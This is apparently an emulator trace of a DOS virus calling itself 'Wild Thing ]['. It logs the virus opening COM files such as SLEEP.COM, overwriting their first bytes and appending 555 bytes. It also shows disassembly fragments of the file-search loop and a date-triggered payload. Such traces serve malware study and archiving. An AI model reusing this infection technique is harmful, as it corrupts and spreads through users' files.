2018-12-25T12:44:52.796693976Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.798418987Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.806379296Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.808219898Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.815763499Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.825414459Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.828520176Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.834115905Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.846453174Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.854085138Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.856023009Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.862352108Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.864471712Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.867003423Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.868607826Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.877194908Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.878840995Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.886174616Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.895829191Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.898447597Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.903765665Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.913953024Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.920364928Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.921689216Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.92883719Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.93022248Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.932732783Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.93537053Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.943093087Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.944486189Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.953019575Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.962559253Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.965395673Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.971290031Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.982142919Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.988504011Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.989956399Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.996838222Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.998347488Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.000958507Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.00257677Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.008609859Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.009586499Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.015517762Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.025014543Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.027782809Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.03428442Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.046749548Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.053412526Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.05539632Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.06198012Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.063592094Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.067344805Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.06890432Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.076412333Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.078354959Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.086007929Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.095024106Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.098227827Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.104607453Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.114179176Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.121617644Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.122928073Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.129170277Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.131699409Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.138713636Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.148546666Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.151724469Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:53.155627025Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:53.157250119Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:53.158949852Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:55.354520904Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:55.356094752Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:55.359284928Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:55.36204554Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:55.372530764Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:55.375064634Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:55.37694968Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:55.392798179Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:55.394330166Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:55.398222083Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:55.401130995Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:55.403688991Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:55.405604558Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:55.408762722Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.412834673Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.417671709Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:55.427588515Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:55.429130737Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:55.431030458Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:55.450318988Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:55.454308216Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:55.455433269Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.456314297Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.45748853Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.45861029Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.459803183Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:55.468186187Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:55.470311892Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:55.472290395Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.474633006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.476038392Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.477398013Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.479517174Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.481544351Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.483942005Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.486343085Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.488768207Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.490186609Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.49170408Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.493416906Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.494789475Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.496678809Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.497988287Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.499256992Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.501027079Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.50247212Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.503709607Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.505420701Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.506670819Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.507806856Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.509850048Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.511166347Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.512430193Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.51425382Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.515553598Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.516828669Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.518672673Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.520002231Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:55.524614134Z 62 PC: 8f90e | Close file
2018-12-25T12:44:55.526733218Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:55.528854477Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:55.530516417Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:55.535433968Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:55.536699711Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:55.541419113Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:55.550739155Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:55.552120961Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:55.55360034Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:55.555585093Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:55.55676108Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:55.558285669Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:55.560072615Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:55.561404473Z 73 PC: 8efea | Release memory
2018-12-25T12:44:55.562709469Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:55.565815498Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:55.567860392Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:55.569677708Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:55.571765388Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:55.58101705Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:55.586318831Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:55.588579885Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:55.590261352Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:55.611797032Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:55.612916881Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:55.614717064Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:55.617771643Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:55.621703899Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:55.623079324Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:55.625554629Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:55.627601916Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:55.628938436Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:55.632210386Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:55.637509028Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:55.644133101Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:55.648291924Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:55.649423302Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:55.650413336Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:55.651893698Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:55.654092862Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:55.655103584Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:55.65713106Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.658325708Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.659522077Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:55.662256926Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:55.663915516Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:55.670226957Z 62 PC: 131ba | Close file
2018-12-25T12:44:55.673227712Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:55.674160608Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:55.675366904Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:55.67770938Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:55.679199682Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:55.68144943Z 73 PC: 119df | Release memory
2018-12-25T12:44:55.683140957Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:55.684666859Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.596153791Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.608858376Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.611291679Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.614336647Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.617484283Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.623550849Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.62877406Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.633294235Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.645121313Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.651717902Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.653110512Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.65765062Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.658683289Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.661074748Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.66235146Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.669825021Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.672456625Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.677877197Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.690998202Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.693856221Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.706176256Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.715820493Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.722378089Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.724658525Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.73115436Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.732734877Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.736281442Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.737979298Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.746328638Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.748373466Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.755941489Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.765781486Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.76945814Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.775139575Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.784546455Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.801585332Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.802863251Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.809486613Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.811348711Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.813811423Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.8151988Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.822192534Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.823769909Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.831349875Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.841560798Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.843419956Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.847192916Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.854187962Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.861519531Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.863004745Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.869658863Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.871153029Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.873754531Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.875554244Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.883533783Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.8848967Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.892291697Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.902832671Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.905390203Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.910807148Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.920758855Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.928882471Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.929970234Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.934529429Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.935516378Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.9373026Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.939044829Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.943972244Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.945076177Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.950316064Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.95664122Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.958488213Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.962790689Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.969970493Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.977069812Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.978788756Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.982789833Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.983905441Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.991152339Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.99315038Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.00146663Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.004016729Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.012791316Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.022914475Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.02611396Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.031783118Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.042041157Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.049051922Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.050418153Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.056617491Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.05892521Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.061419512Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.063068491Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.071746361Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.073909658Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.081267826Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.091257813Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.093702567Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.09907873Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.108689822Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.119817739Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.121844666Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.12832675Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.129943865Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.139399667Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.149465395Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.152037855Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:53.156567731Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:53.159428638Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:53.160664353Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:55.358110189Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:55.360113851Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:55.362950962Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:55.365671487Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:55.375952639Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:55.377935484Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:55.379945987Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:55.395545514Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:55.397280288Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:55.401364903Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:55.404351622Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:55.408755126Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:55.41075004Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:55.414056391Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.418526084Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:55.423976982Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:55.433756993Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:55.436095239Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:55.438243913Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:55.458073599Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:55.463267518Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:55.464465053Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.465846875Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:55.467675604Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.468876333Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:55.469984354Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:55.477890827Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:55.479635626Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:55.481341707Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.483448671Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.485024851Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.486410993Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.48849112Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.489978575Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.491429876Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.495079336Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.496441076Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.497809158Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.50025761Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.5016399Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.503427205Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.505718463Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.507461849Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.509139111Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:55.511712371Z 62 PC: 8f8f2 | Close file (See above)
